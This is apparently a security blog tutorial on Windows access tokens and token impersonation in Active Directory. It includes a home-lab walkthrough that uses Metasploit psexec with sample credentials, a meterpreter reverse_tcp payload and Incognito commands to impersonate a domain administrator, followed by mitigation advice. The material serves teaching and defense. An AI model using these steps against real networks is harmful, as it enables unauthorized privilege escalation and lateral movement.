Game of Tokens: AD post exploitation with Token Impersonation
Greetings fellow Readers. Welcome to “Game of Tokens,” where the rules of engagement shift, and the battle for Active Directory (AD) control reaches new heights.
What are Tokens ?
In straightforward terms, these are transient keys that grant you system or network entry without the need to input your credentials each time you want to access a file.
How do these tokens work ?
Before delving into the inner workings of these tokens, let’s explore a few key processes that will provide us with a better understanding of how they operate.
- Userinit: Userinit.exe is a critical process that runs during the Windows startup. It’s responsible for setting up the user’s environment after they log in. This includes loading the user’s profile, executing logon scripts, and preparing the desktop.
- Winlogon: Winlogon.exe is another essential process involved in user authentication and session management. It handles the login and logout procedures, as well as interactions with the Secure Attention Sequence (SAS) dialog, such as the Ctrl+Alt+Delete screen. Winlogon ensures that the user’s session is secure and correctly initialized during login and logout.
- LSASS (Local Security Authority Subsystem Service): LSASS.exe is a core component of Windows security. It manages user authentication and security policies. LSASS is responsible for enforcing security policies, handling password changes, and verifying user credentials during the login process. It also plays a crucial role in generating access tokens, which control user privileges and access rights.
Now, let’s grasp how the tokens function through an illustrative scenario.
Imagine you’re the boss of a super-secret club, and you have a magical stamp. This stamp is like your “access token.” It lets you decide who can go where in the club and what they can do.
But here’s the cool part: your magical stamp can make copies! So, when you let someone into your club (like your buddy Winlogon), they get their own stamp with the same powers. Winlogon is like your trusty sidekick.
Now, every time your buddies (like Userinit and their friends) want to do something in the club, they use their stamped hands to show that they have your permission. So, it’s like they’re doing things with your superpowers.
This whole process happens on your club’s computer (LSASS), and it’s essential to keep everything secure. It’s like the computer’s way of making sure only the right people can do the right things.
And that’s how access tokens work in Windows — like magical stamps that let you and your buddies run the show!
Token Impersonation is often used in post-exploitation scenarios, where an attacker has already compromised a system but needs to escalate their privileges further. By impersonating the token of a higher-privileged user, the attacker can gain access to resources and perform actions that would otherwise be restricted.
Types Of Tokens
Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.
- Delegate: They are created through an interactive log in on windows Primarily through logging into a machine or using Remote Desktop (RDP).Delegate token pose largest threat as they can be used to impersonate a token on any system.
- Impersonate: They are created as a direct result of a non-interactive login on windows. Typically through specific system services or domain logons such as attaching a network drive or a domain logon script.
Why Token Impersonation is dangerous ?
Token impersonation can be dangerous because it allows an attacker to effectively assume the identity and privileges of another user or process in a computer system. here’s why it’s considered risky:
- Privilege Escalation: Attackers can use token impersonation to escalate their privileges within a system or network.
- Stealthy Intrusion: Token impersonation is often difficult to detect because the attacker is operating under the guise of a legitimate user or process. This makes it an effective way to move laterally within a network without raising suspicions.
- Access to Sensitive Data: Attackers can access sensitive data, manipulate critical system settings, and carry out malicious activities, all while appearing as a trusted user or process.
- Bypassing Security Controls: Token impersonation can be used to bypass security controls and gain unauthorized access to protected resources, making it a significant threat to the integrity of a system.
- Lack of Traceability: Since the actions are attributed to the impersonated user or process, it becomes challenging to trace malicious activity back to the actual attacker. This can hinder incident response efforts.
- Abuse of Trusted Relationships: Token impersonation can exploit the trust relationships that exist between users and systems. This abuse of trust can lead to significant security breaches.
Tell me, Why did the token impersonation expert always win at hide and seek? Because they could hide as anyone!
Attack Demonstration
This attack requires you to have an initial foothold within the network -> like access to a shell or a set of credentials.
For this attack, we’ll leverage Incognito, a built-in tool in Metasploit.
This attack is showcased in an Active Directory home lab. You are encouraged to replicate this experiment in your own home lab, but always ensure that your actions are within legal boundaries.
Step-1: Gaining Initial Foothold using metasploit
Initially, we’ll establish a foothold in the network. This attack depends on having that initial foothold, and we already possess the necessary credentials to commence.
Username: fcastle
Password: Password123
We will use psexec module in metasploit
msfconsole
set windows/smb/psexec
Step-2: Setting up the required options
Set SMBuser, SMBpass, SMBdomain, LHOST, RHOST.
Set Target to Native upload (Id 2).
Set payload to windows/x64/meterpreter/reverse_tcp.
Step-3: Run the module
We will run the psexec module and gain a meterpreter shell.
Step-4: Load the incognito module.
load incognito
Using Incognito
- To view the tokens, type list_tokens -u. it will list all the delegation Tokens Available. we can see that token for MARVEL\Administrator is available.
- To impersonate a Token, type impersonate_token MARVEL\\Administrator. (We will use extra \ for character escaping)
- After successfully impersonating the token, we can use getuid command to get the real user id of the calling process.
- And at last we have escalated our privileges to the highest level in the network.
To return to our original identity, the one we initially assumed, we will employ the ‘rev2self’ command.
Mitigation
Mitigating the risks of token impersonation requires a combination of proactive measures and security best practices. Here are some key mitigation strategies:
- Implement Least Privilege: Ensure that users and processes have the minimum level of access necessary to perform their tasks. This limits the potential damage that can be done if a token impersonation attack occurs.
- Monitor and Audit: Implement robust monitoring and auditing of user activities and access control changes. Use security information and event management (SIEM) systems to detect and alert on suspicious behavior.
- Regularly Review Access Rights: Periodically review and update user and group access rights. Remove unnecessary privileges and access rights to reduce the potential impact of an attack.
- Multi-Factor Authentication (MFA): Enforce MFA for user accounts, especially for privileged users. MFA can significantly enhance security by adding an additional layer of authentication.
- Endpoint Protection: Employ endpoint protection solutions that can detect and prevent malicious activities, including token impersonation.
- Network Segmentation: Implement network segmentation to isolate critical assets and restrict lateral movement within the network. This can limit the spread of attacks.
- Privileged Access Management (PAM): Use PAM solutions to tightly control and monitor access to privileged accounts. This helps prevent unauthorized access and reduces the risk of token impersonation.
- Limit Access to Tokens: Restrict access to access tokens to only the users and processes that require them. Use proper access control mechanisms to limit token availability.
- User Training: Educate users and administrators about the risks of token impersonation and the importance of strong authentication and access control.
- Patch and Update: Keep systems and software up to date with the latest security patches and updates to mitigate vulnerabilities that attackers could exploit.
- Incident Response Plan: Develop and maintain a robust incident response plan that includes procedures for identifying and responding to token impersonation attacks.
- Red Team Testing: Conduct regular red team exercises to identify vulnerabilities and weaknesses in your security measures and incident response procedures.
- Security Policies and Procedures: Establish and enforce security policies and procedures that define acceptable use, access control, and authentication requirements.
Mitigating token impersonation threats requires a multi-layered approach that combines technical controls, user awareness, and proactive monitoring. Additionally, it’s essential to stay informed about emerging threats and adapt your security measures accordingly.